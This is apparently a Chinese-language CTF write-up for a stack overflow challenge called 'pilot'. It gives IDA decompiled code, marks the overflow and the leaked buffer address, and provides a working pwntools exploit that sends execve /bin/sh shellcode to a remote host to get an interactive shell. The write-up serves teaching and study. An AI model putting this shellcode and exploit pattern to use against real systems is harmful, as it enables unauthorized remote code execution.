很基础的栈溢出,先用checksec查看,什么保护都没开,基本就是用shellcode或者程序内直接有system之类的语句了
放到IDA中查看
signed __int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
__int64 v3; // rax
__int64 v4; // rax
__int64 v5; // rax
__int64 v6; // rax
__int64 v7; // rax
__int64 v8; // rax
__int64 v9; // rax
__int64 v10; // rax
__int64 v11; // rax
__int64 v12; // rax
char buf; // [rsp+0h] [rbp-20h]
setvbuf(stdout, 0LL, 2, 0LL);
setvbuf(stdin, 0LL, 2, 0LL);
v3 = std::operator<<<std::char_traits<char>>(&std::cout, "[*]Welcome DropShip Pilot...");
std::ostream::operator<<(v3, &std::endl<char,std::char_traits<char>>);
v4 = std::operator<<<std::char_traits<char>>(&std::cout, "[*]I am your assitant A.I....");
std::ostream::operator<<(v4, &std::endl<char,std::char_traits<char>>);
v5 = std::operator<<<std::char_traits<char>>(&std::cout, "[*]I will be guiding you through the tutorial....");
std::ostream::operator<<(v5, &std::endl<char,std::char_traits<char>>);
v6 = std::operator<<<std::char_traits<char>>(
&std::cout,
"[*]As a first step, lets learn how to land at the designated location....");
std::ostream::operator<<(v6, &std::endl<char,std::char_traits<char>>);
v7 = std::operator<<<std::char_traits<char>>(
&std::cout,
"[*]Your mission is to lead the dropship to the right location and execute sequence of instructions to save Marines & Medics...");
std::ostream::operator<<(v7, &std::endl<char,std::char_traits<char>>);
v8 = std::operator<<<std::char_traits<char>>(&std::cout, "[*]Good Luck Pilot!....");
std::ostream::operator<<(v8, &std::endl<char,std::char_traits<char>>);
v9 = std::operator<<<std::char_traits<char>>(&std::cout, "[*]Location:");
v10 = std::ostream::operator<<(v9, &buf);//打印出buf的地址
std::ostream::operator<<(v10, &std::endl<char,std::char_traits<char>>);
std::operator<<<std::char_traits<char>>(&std::cout, "[*]Command:");
if ( read(0, &buf, 0x40uLL) > 4 )//buf距离rbp只有0x20字节,却可以输入0x40字节,溢出点
return 0LL;
v11 = std::operator<<<std::char_traits<char>>(&std::cout, "[*]There are no commands....");
std::ostream::operator<<(v11, &std::endl<char,std::char_traits<char>>);
v12 = std::operator<<<std::char_traits<char>>(&std::cout, "[*]Mission Failed....");
std::ostream::operator<<(v12, &std::endl<char,std::char_traits<char>>);
return 0xFFFFFFFFLL;
}
整个程序的重点只有三点
1、buf距离rbp 0x20字节
2、v10 = std::ostream::operator<<(v9, &buf);打印出buf的地址
3、if ( read(0, &buf, 0x40uLL) > 4 )可以给0x20字节栈空间写入0x40字节,栈溢出,长度足够写shellcode了
最后构造payload的时候在exploit-db上找的shellcode不能用,想起学长写过题解就直接用学长的shellcode了
from pwn import *
context(log_level = 'debug', arch = 'i386', os = 'linux')
#target= process("./pilot")
target=remote('106.2.25.7', 8003)
target.recvuntil("[*]Location:")
buf_addr=int(target.recv(14),16)
#https://www.exploit-db.com/shellcodes/40131
#shellcode="\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x87\xe3\xb0\x0b\xcd\x80"
#execve /bin/sh
#自己找的shellcode没办法用
shellcode="\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"
payload=shellcode+"a"*(0x20+8-len(shellcode))+p64(buf_addr)#用'a'把剩余的栈空间和rbp填充了
target.recvuntil(':')
target.sendline(payload)
target.interactive()